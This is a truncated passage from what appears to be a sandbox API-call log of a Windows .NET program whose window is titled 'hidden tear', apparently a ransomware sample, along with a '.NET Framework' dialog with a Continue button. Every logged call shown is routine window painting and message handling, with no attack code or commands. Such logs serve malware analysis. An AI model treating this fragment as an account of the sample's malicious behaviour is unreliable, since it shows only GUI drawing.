cy=23, hdcSrc=0xd10101b7, x1=0, y1=0, rop=0xcc0020) returned 1 [0058.343] GdipReleaseDC (graphics=0x4e4f360, hdc=0xd10101b7) returned 0x0 [0058.343] SelectPalette (hdc=0x101084f, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.343] SelectObject (hdc=0xd10101b7, h=0x185000f) returned 0x3e050241 [0058.343] DeleteDC (hdc=0xd10101b7) returned 1 [0058.343] GdipDeleteGraphics (graphics=0x4e4f360) returned 0x0 [0058.343] EndPaint (hWnd=0x201e8, lpPaint=0x3ae1dc) returned 1 [0058.343] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.343] IsWindowUnicode (hWnd=0x301c4) returned 1 [0058.343] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.344] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.344] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.344] BeginPaint (in: hWnd=0x301c4, lpPaint=0x3ae208 | out: lpPaint=0x3ae208) returned 0x1501025e [0058.344] SelectPalette (hdc=0x1501025e, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.344] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0058.344] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0058.344] GetSystemMetrics (nIndex=42) returned 0 [0058.344] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3ae198, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0058.344] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3ae198) returned 0xb [0058.344] SelectPalette (hdc=0x1501025e, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.344] EndPaint (hWnd=0x301c4, lpPaint=0x3ae204) returned 1 [0058.344] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.344] IsWindowUnicode (hWnd=0x201e6) returned 1 [0058.344] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.344] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.344] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.344] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.344] IsWindowUnicode (hWnd=0x201e6) returned 1 [0058.344] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.344] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.344] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.344] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x2a1, wParam=0x0, lParam=0x60044) returned 0x0 [0058.344] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 0 [0058.345] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 0 [0058.442] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.627] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0058.627] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.627] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.627] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.628] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x46, wParam=0x0, lParam=0x3ae5e4) returned 0x0 [0058.630] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x84, wParam=0x0, lParam=0x1de031a) returned 0x1 [0058.630] IsWindowUnicode (hWnd=0x201e6) returned 1 [0058.630] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.630] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x84, wParam=0x0, lParam=0x1de031a) returned 0x1 [0058.630] GetDlgItem (hDlg=0x201ca, nIDDlgItem=0) returned 0x0 [0058.630] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x210, wParam=0x201, lParam=0x640125) returned 0x0 [0058.630] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x21, wParam=0x201ca, lParam=0x2010001) returned 0x1 [0058.631] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x21, wParam=0x201ca, lParam=0x2010001) returned 0x1 [0058.631] SetCursor (hCursor=0x10003) returned 0x10003 [0058.631] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.631] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.631] GetKeyState (nVirtKey=1) returned -127 [0058.631] GetKeyState (nVirtKey=2) returned 0 [0058.631] GetKeyState (nVirtKey=4) returned 0 [0058.631] GetKeyState (nVirtKey=5) returned 0 [0058.631] GetKeyState (nVirtKey=6) returned 0 [0058.631] IsWindowVisible (hWnd=0x201e6) returned 1 [0058.631] IsWindowEnabled (hWnd=0x201e6) returned 1 [0058.631] SetFocus (hWnd=0x201e6) returned 0x201f4 [0058.631] GetFocus () returned 0x201e6 [0058.631] IsChild (hWndParent=0x201ca, hWnd=0x201e6) returned 1 [0058.631] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x8, wParam=0x201e6, lParam=0x0) returned 0x0 [0058.631] GetCapture () returned 0x0 [0058.631] InvalidateRect (hWnd=0x201f4, lpRect=0x0, bErase=0) returned 1 [0058.631] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201f4, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0058.632] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0058.632] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0058.633] InvalidateRect (hWnd=0x201f4, lpRect=0x0, bErase=0) returned 1 [0058.633] InvalidateRect (hWnd=0x201e6, lpRect=0x0, bErase=0) returned 1 [0058.633] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x7, wParam=0x201f4, lParam=0x0) returned 0x0 [0058.633] GetStockObject (i=5) returned 0x1900015 [0058.634] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0058.634] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0xd, wParam=0xa, lParam=0x6b2c3e0) returned 0x9 [0058.634] GetDlgItem (hDlg=0x201ca, nIDDlgItem=131558) returned 0x201e6 [0058.634] SendMessageW (hWnd=0x201e6, Msg=0x202b, wParam=0x201e6, lParam=0x3ade64) returned 0x0 [0058.634] CallWindowProcW (lpPrevWndFunc=0x73cfb495, hWnd=0x201e6, Msg=0x202b, wParam=0x201e6, lParam=0x3ade64) returned 0x0 [0058.634] InvalidateRect (hWnd=0x201e6, lpRect=0x0, bErase=0) returned 1 [0058.634] GetFocus () returned 0x201e6 [0058.634] GetFocus () returned 0x201e6 [0058.634] GetFocus () returned 0x201e6 [0058.634] GetKeyState (nVirtKey=1) returned -127 [0058.634] GetKeyState (nVirtKey=2) returned 0 [0058.634] GetKeyState (nVirtKey=4) returned 0 [0058.634] GetKeyState (nVirtKey=5) returned 0 [0058.635] GetKeyState (nVirtKey=6) returned 0 [0058.635] GetCapture () returned 0x0 [0058.635] SetCapture (hWnd=0x201e6) returned 0x0 [0058.635] GetKeyState (nVirtKey=1) returned -127 [0058.635] GetKeyState (nVirtKey=2) returned 0 [0058.635] GetKeyState (nVirtKey=4) returned 0 [0058.635] GetKeyState (nVirtKey=5) returned 0 [0058.635] GetKeyState (nVirtKey=6) returned 0 [0058.635] NotifyWinEvent (event=0x800a, hwnd=0x201e6, idObject=-4, idChild=0) [0058.635] InvalidateRect (hWnd=0x201e6, lpRect=0x3ae3a4, bErase=0) returned 1 [0058.635] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.635] GetMessageA (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.635] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.635] DispatchMessageA (lpMsg=0x3ae6fc) returned 0x0 [0058.635] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.635] IsWindowUnicode (hWnd=0x201e6) returned 1 [0058.635] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.635] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.635] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.636] MapWindowPoints (in: hWndFrom=0x201e6, hWndTo=0x0, lpPoints=0x24622a4, cPoints=0x1 | out: lpPoints=0x24622a4) returned 30933718 [0058.636] NotifyWinEvent (event=0x800a, hwnd=0x201e6, idObject=-4, idChild=0) [0058.636] InvalidateRect (hWnd=0x201e6, lpRect=0x3ae348, bErase=0) returned 1 [0058.636] UpdateWindow (hWnd=0x201e6) returned 1 [0058.636] BeginPaint (in: hWnd=0x201e6, lpPaint=0x3adef0 | out: lpPaint=0x3adef0) returned 0x4010840 [0058.636] SelectPalette (hdc=0x4010840, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.636] CreateCompatibleDC (hdc=0x4010840) returned 0x7e010763 [0058.636] SelectObject (hdc=0x7e010763, h=0x3e050241) returned 0x185000f [0058.636] GdipCreateFromHDC (hdc=0x7e010763, graphics=0x3adf08) returned 0x0 [0058.636] GdipTranslateWorldTransform (graphics=0x4e4f360, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0058.636] GdipSetClipRectI (graphics=0x4e4f360, x=0, y=0, width=100, height=23, combineMode=0x0) returned 0x0 [0058.636] GdipCreateMatrix (matrix=0x3adf50) returned 0x0 [0058.636] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.637] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3adf68) returned 0x0 [0058.637] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.637] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.637] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.637] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.637] GdipCreateRegion (region=0x3adf50) returned 0x0 [0058.637] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.637] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf5c) returned 0x0 [0058.637] GdipSaveGraphics (graphics=0x4e4f360, state=0x3adf88) returned 0x0 [0058.637] GdipRestoreGraphics (graphics=0x4e4f360, state=0xfdaa0dbd) returned 0x0 [0058.637] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.637] GdipGetDC (graphics=0x4e4f360, hdc=0x3add68) returned 0x0 [0058.637] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.637] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.637] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.637] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.637] SaveDC (hdc=0x7e010763) returned 1 [0058.637] GetNearestColor (hdc=0x7e010763, color=0xf0f0f0) returned 0xf0f0f0 [0058.637] GetNearestColor (hdc=0x7e010763, color=0xa0a0a0) returned 0xa0a0a0 [0058.638] GetNearestColor (hdc=0x7e010763, color=0x696969) returned 0x696969 [0058.638] GetNearestColor (hdc=0x7e010763, color=0xa0a0a0) returned 0xa0a0a0 [0058.638] GetNearestColor (hdc=0x7e010763, color=0x0) returned 0x0 [0058.638] GetNearestColor (hdc=0x7e010763, color=0xffffff) returned 0xffffff [0058.638] GetNearestColor (hdc=0x7e010763, color=0xe5e5e5) returned 0xe5e5e5 [0058.638] GetNearestColor (hdc=0x7e010763, color=0xd7d7d7) returned 0xd7d7d7 [0058.638] GetNearestColor (hdc=0x7e010763, color=0x0) returned 0x0 [0058.638] RestoreDC (hdc=0x7e010763, nSavedDC=-1) returned 1 [0058.638] GdipReleaseDC (graphics=0x4e4f360, hdc=0x7e010763) returned 0x0 [0058.638] IsAppThemed () returned 0x1 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] IsAppThemed () returned 0x1 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] DrawTextExW (in: hdc=0x7701083a, lpchText="&Continue", cchText=9, lprc=0x3adc24, format=0x102415, lpdtp=0x24629e4 | out: lpchText="&Continue", lprc=0x3adc24) returned 13 [0058.638] IsAppThemed () returned 0x1 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] IsAppThemed () returned 0x1 [0058.638] GetThemeAppProperties () returned 0x3 [0058.638] GetThemeAppProperties () returned 0x3 [0058.639] IsAppThemed () returned 0x1 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] IsAppThemed () returned 0x1 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] IsThemePartDefined () returned 0x1 [0058.639] IsAppThemed () returned 0x1 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0058.639] IsAppThemed () returned 0x1 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] IsAppThemed () returned 0x1 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] GetThemeAppProperties () returned 0x3 [0058.639] IsThemePartDefined () returned 0x1 [0058.639] GdipCreateRegion (region=0x3adc6c) returned 0x0 [0058.639] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.639] GdipCreateMatrix (matrix=0x3adc6c) returned 0x0 [0058.639] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.639] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3adc84) returned 0x0 [0058.639] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.639] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.639] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.639] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.639] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.639] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.639] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.640] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adcac) returned 0x0 [0058.640] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adc9c) returned 0x0 [0058.640] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adc9c) returned 0x0 [0058.640] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.640] GdipGetDC (graphics=0x4e4f360, hdc=0x3adcb4) returned 0x0 [0058.640] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.640] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.640] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.640] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.640] SaveDC (hdc=0x7e010763) returned 1 [0058.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe8040827 [0058.640] GetClipRgn (hdc=0x7e010763, hrgn=0xe8040827) returned 0 [0058.640] SelectClipRgn (hdc=0x7e010763, hrgn=0x62040871) returned 2 [0058.640] DeleteObject (ho=0xe8040827) returned 1 [0058.640] DeleteObject (ho=0x62040871) returned 1 [0058.640] OffsetViewportOrgEx (in: hdc=0x7e010763, x=0, y=0, lppt=0x2463094 | out: lppt=0x2463094) returned 1 [0058.640] DrawThemeParentBackground () returned 0x0 [0058.640] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ada28 | out: lpwndpl=0x3ada28) returned 1 [0058.640] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ad9d4 | out: lpRect=0x3ad9d4) returned 1 [0058.640] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.640] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.641] GetSystemMetrics (nIndex=42) returned 0 [0058.641] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ad878, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.641] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ad878) returned 0x18 [0058.641] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ad8dc | out: lpRect=0x3ad8dc) returned 1 [0058.641] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.641] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.641] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.641] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.641] SaveDC (hdc=0x7e010763) returned 2 [0058.641] GetNearestColor (hdc=0x7e010763, color=0xf0f0f0) returned 0xf0f0f0 [0058.641] CreateSolidBrush (color=0xf0f0f0) returned 0x22100257 [0058.641] FillRect (hDC=0x7e010763, lprc=0x3ad77c, hbr=0x22100257) returned 1 [0058.641] DeleteObject (ho=0x22100257) returned 1 [0058.641] RestoreDC (hdc=0x7e010763, nSavedDC=-1) returned 1 [0058.641] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.641] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.641] GetSystemMetrics (nIndex=42) returned 0 [0058.641] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ad818, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.641] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ad818) returned 0x18 [0058.641] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ad87c | out: lpRect=0x3ad87c) returned 1 [0058.642] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.642] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.642] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.642] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.642] SaveDC (hdc=0x7e010763) returned 2 [0058.642] GetNearestColor (hdc=0x7e010763, color=0xf0f0f0) returned 0xf0f0f0 [0058.642] CreateSolidBrush (color=0xf0f0f0) returned 0x23100257 [0058.642] FillRect (hDC=0x7e010763, lprc=0x3ad71c, hbr=0x23100257) returned 1 [0058.642] DeleteObject (ho=0x23100257) returned 1 [0058.642] RestoreDC (hdc=0x7e010763, nSavedDC=-1) returned 1 [0058.642] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.642] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.642] GetSystemMetrics (nIndex=42) returned 0 [0058.642] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3ad818, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.642] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3ad818) returned 0x18 [0058.642] RestoreDC (hdc=0x7e010763, nSavedDC=-1) returned 1 [0058.642] GdipReleaseDC (graphics=0x4e4f360, hdc=0x7e010763) returned 0x0 [0058.642] IsAppThemed () returned 0x1 [0058.642] GetThemeAppProperties () returned 0x3 [0058.642] GetThemeAppProperties () returned 0x3 [0058.642] IsAppThemed () returned 0x1 [0058.642] GetThemeAppProperties () returned 0x3 [0058.642] GetThemeAppProperties () returned 0x3 [0058.643] IsThemePartDefined () returned 0x1 [0058.643] GdipCreateRegion (region=0x3adc10) returned 0x0 [0058.643] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.643] GdipCreateMatrix (matrix=0x3adc10) returned 0x0 [0058.643] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.643] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3adc28) returned 0x0 [0058.643] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.643] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.643] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.643] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.643] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.643] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.643] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.643] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adc50) returned 0x0 [0058.643] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adc40) returned 0x0 [0058.643] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adc40) returned 0x0 [0058.643] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.643] GdipGetDC (graphics=0x4e4f360, hdc=0x3adc58) returned 0x0 [0058.643] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.643] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.643] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.643] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.644] SaveDC (hdc=0x7e010763) returned 1 [0058.644] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x63040871 [0058.644] GetClipRgn (hdc=0x7e010763, hrgn=0x63040871) returned 0 [0058.644] SelectClipRgn (hdc=0x7e010763, hrgn=0xea040827) returned 2 [0058.644] DeleteObject (ho=0x63040871) returned 1 [0058.644] DeleteObject (ho=0xea040827) returned 1 [0058.644] OffsetViewportOrgEx (in: hdc=0x7e010763, x=0, y=0, lppt=0x2463a18 | out: lppt=0x2463a18) returned 1 [0058.644] IsAppThemed () returned 0x1 [0058.644] GetThemeAppProperties () returned 0x3 [0058.644] GetThemeAppProperties () returned 0x3 [0058.644] DrawThemeBackground () returned 0x0 [0058.644] RestoreDC (hdc=0x7e010763, nSavedDC=-1) returned 1 [0058.644] GdipReleaseDC (graphics=0x4e4f360, hdc=0x7e010763) returned 0x0 [0058.644] GdipCreateRegion (region=0x3adbf8) returned 0x0 [0058.644] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.644] GdipCreateMatrix (matrix=0x3adbf8) returned 0x0 [0058.644] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.644] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3adc10) returned 0x0 [0058.644] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.644] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.645] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.645] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.645] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.645] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.645] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.645] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adc38) returned 0x0 [0058.645] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adc28) returned 0x0 [0058.645] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adc28) returned 0x0 [0058.645] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.645] GdipGetDC (graphics=0x4e4f360, hdc=0x3adc40) returned 0x0 [0058.645] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.645] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.645] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.645] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.645] SaveDC (hdc=0x7e010763) returned 1 [0058.645] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xeb040827 [0058.645] GetClipRgn (hdc=0x7e010763, hrgn=0xeb040827) returned 0 [0058.645] SelectClipRgn (hdc=0x7e010763, hrgn=0x64040871) returned 2 [0058.645] DeleteObject (ho=0xeb040827) returned 1 [0058.645] DeleteObject (ho=0x64040871) returned 1 [0058.646] OffsetViewportOrgEx (in: hdc=0x7e010763, x=0, y=0, lppt=0x2463cec | out: lppt=0x2463cec) returned 1 [0058.646] IsAppThemed () returned 0x1 [0058.646] GetThemeAppProperties () returned 0x3 [0058.646] GetThemeAppProperties () returned 0x3 [0058.646] GetThemeBackgroundContentRect () returned 0x0 [0058.646] RestoreDC (hdc=0x7e010763, nSavedDC=-1) returned 1 [0058.646] GdipReleaseDC (graphics=0x4e4f360, hdc=0x7e010763) returned 0x0 [0058.646] IsAppThemed () returned 0x1 [0058.646] GetThemeAppProperties () returned 0x3 [0058.646] GetThemeAppProperties () returned 0x3 [0058.646] GdipGetTextRenderingHint (graphics=0x4e4f360, mode=0x3add70) returned 0x0 [0058.646] GdipGetDC (graphics=0x4e4f360, hdc=0x3add5c) returned 0x0 [0058.646] GetCurrentObject (hdc=0x7e010763, type=0x1) returned 0x1b00017 [0058.646] GetCurrentObject (hdc=0x7e010763, type=0x2) returned 0x1900010 [0058.646] GetCurrentObject (hdc=0x7e010763, type=0x7) returned 0x3e050241 [0058.646] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.646] SaveDC (hdc=0x7e010763) returned 1 [0058.646] GetTextAlign (hdc=0x7e010763) returned 0x0 [0058.646] GetTextColor (hdc=0x7e010763) returned 0x0 [0058.646] GetCurrentObject (hdc=0x7e010763, type=0x6) returned 0x18a002e [0058.646] GetObjectW (in: h=0x18a002e, c=92, pv=0x3ada64 | out: pv=0x3ada64) returned 92 [0058.646] SelectObject (hdc=0x7e010763, h=0x2d0a07c0) returned 0x18a002e [0058.646] GetBkMode (hdc=0x7e010763) returned 2 [0058.647] SetBkMode (hdc=0x7e010763, mode=1) returned 2 [0058.647] DrawTextExW (in: hdc=0x7e010763, lpchText="&Continue", cchText=9, lprc=0x3adb38, format=0x102415, lpdtp=0x2464080 | out: lpchText="&Continue", lprc=0x3adb38) returned 13 [0058.647] DrawTextExW (in: hdc=0x7e010763, lpchText="&Continue", cchText=9, lprc=0x3adcf0, format=0x102015, lpdtp=0x2464080 | out: lpchText="&Continue", lprc=0x3adcf0) returned 13 [0058.647] RestoreDC (hdc=0x7e010763, 